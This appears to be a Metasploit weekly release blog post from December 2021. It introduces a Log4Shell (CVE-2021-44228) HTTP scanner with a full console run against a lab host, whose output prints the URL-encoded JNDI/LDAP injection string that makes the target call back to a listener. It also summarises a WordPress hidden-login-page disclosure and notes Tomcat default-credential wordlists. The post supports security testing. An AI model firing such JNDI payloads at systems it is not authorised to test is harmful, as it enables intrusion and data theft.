Last updated at Fri, 17 Dec 2021 22:53:06 GMT
Log4Shell - Log4j HTTP Scanner
Versions of Apache Log4j impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.
This module will scan an HTTP endpoint for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying instances that are vulnerable via one of the pre-determined HTTP request injection points.
This module has been successfully tested with:
- Apache Solr
- Apache Struts2
- Spring Boot
msf6 > use auxiliary/scanner/http/log4shell_scanner msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128 RHOSTS => 192.168.159.128 msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128 SRVHOST => 192.168.159.128 msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080 RPORT => 8080 msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/ TARGETURI => /struts2-showcase/ msf6 auxiliary(scanner/http/log4shell_scanner) > run [*] Started service listener on 192.168.159.128:389 [+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/http/log4shell_scanner) >
For more details, please see the official Rapid7 Log4Shell CVE-2021-44228 analysis.
New module content (2)
- Log4Shell HTTP Scanner by Spencer McIntyre, which exploits CVE-2021-44228 - This module performs a generic scan of a given target for the Log4Shell vulnerability by injecting it into a series of Header fields as well as the URI path.
- WordPress WPS Hide Login Login Page Revealer by h00die and thalakus, which exploits CVE-2021-24917 - A new PR for CVE-2021-24917 was added, which is an information disclosure bug in WPS Hide Login WordPress plugin before 1.9.1. This vulnerability allows unauthenticated users to get the secret login page by setting a random referer string and making a request to
/wp-admin/options.php. Additionally, several WordPress modules were updated to more descriptively report which plugin they found as being vulnerable on a given target.
Enhancements and features
- #15842 from adfoster-r7 - Several libraries within the
libfolder have now been updated to declare Meterpreter compatibility requirements, which will allow users to more easily determine when they are using a library that the current session does not support.
- #15936 from cmaruti - The wordlists for Tomcat Manager have been updated with new default usernames and passwords that can be used by various scanner and exploit modules when trying to find and exploit Tomcat Manager installations with default usernames and/or passwords.
- #15944 from sjanusz-r7 - Adds long form option names to the sessions command, for example
sessions --upgrade 1
- #15965 from adfoster-r7 - Adds a TCP URI scheme for setting
RHOSTS, which allows one to specify the username, password, and the port if it's specified as a string such as
tcp://user:a b firstname.lastname@example.org would translate into the username
a b c, and host
example.comon the default port used by the module in question.
- #15779 from k0pak4 - The code of
lib/msf/core/auxiliary/report.rbhas been improved to fix an error whereby the
report_vuln()would crash if
nilprior to calling
framework.db.report_vuln_attempt(). This has been fixed by checking the value of
vulnand raising a ValidationError if it’s set to
- #15945 from zeroSteiner - This change fixes the Meterpreter > ls command, in the case where one of the files or folders within the listed folder was inaccessible.
- #15952 from sjanusz-r7 - This PR adds a fix for the
creds -dcommand which crashed on some
- #15957 from sjanusz-r7 - A bug existed whereby a value was not correctly checked to ensure it was not
nilprior to being used when saving credentials with Kiwi. This has been addressed by adding improved error checking and handling.
- #15963 from adfoster-r7 - A bug has been fixed that prevented users using Go 1.17 from being able to run Go modules within Metasploit. Additionally the boot process has been altered so that messages about modules not loading are now logged to disk so as to not confuse users about errors in modules that they don't plan to use.
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a
git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).